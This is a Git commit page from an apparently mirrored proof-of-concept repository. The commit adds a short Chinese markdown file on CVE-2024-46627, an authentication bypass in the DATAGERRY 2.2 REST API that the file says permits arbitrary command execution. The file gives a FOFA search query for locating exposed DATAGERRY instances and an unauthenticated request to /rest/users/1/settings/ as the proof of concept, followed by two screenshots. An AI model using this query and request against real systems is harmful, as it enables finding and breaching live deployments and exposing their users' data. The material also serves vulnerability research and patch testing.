admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Create DATAGERRY REST API 身份验证绕过漏洞(CVE-2024-46627).md

Browse Source
This commit is contained in:
Marco 2024-10-11 23:29:36 +08:00
parent 8ebce09291
commit 762d1ca05b
1 changed files with 22 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

22
DATAGERRY/DATAGERRY REST API 身份验证绕过漏洞(CVE-2024-46627).md Normal file
View File

@ -0,0 +1,22 @@
# DATAGERRY REST API 身份验证绕过漏洞(CVE-2024-46627)
DATAGERRY是DATAGerry开源的一个开源 CMDB 和资产管理工具。DATAGERRY 2.2版本存在安全漏洞该漏洞源于存在不正确权限改造允许攻击者通过精心设计的Web请求绕过权限验证而执行任意命令。
## fofa
```javascript
title="datagerry"
```
## poc
```javascript
使用浏览器请求
http://x.x.x.x/rest/users/1/settings/
```
![img](https://mmbiz.qpic.cn/mmbiz_png/lloX2SgC3BPMjTlP4eAgX6Zc4HxQoYayZEcvDCD9ZyvQsiazHy93onsEwibwTxOpUdOlibggicpUTe1zK33DonibzZg/640?wx_fmt=png&from=appmsg&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1)
![img](https://mmbiz.qpic.cn/mmbiz_png/lloX2SgC3BPMjTlP4eAgX6Zc4HxQoYayeAddRKdNr6NiaDNnbicSibT9iapIMV75HbdicG8feHLBTytTVM7lVIdT0icw/640?wx_fmt=png&from=appmsg&tp=wxpic&wxfrom=5&wx_lazy=1&wx_co=1)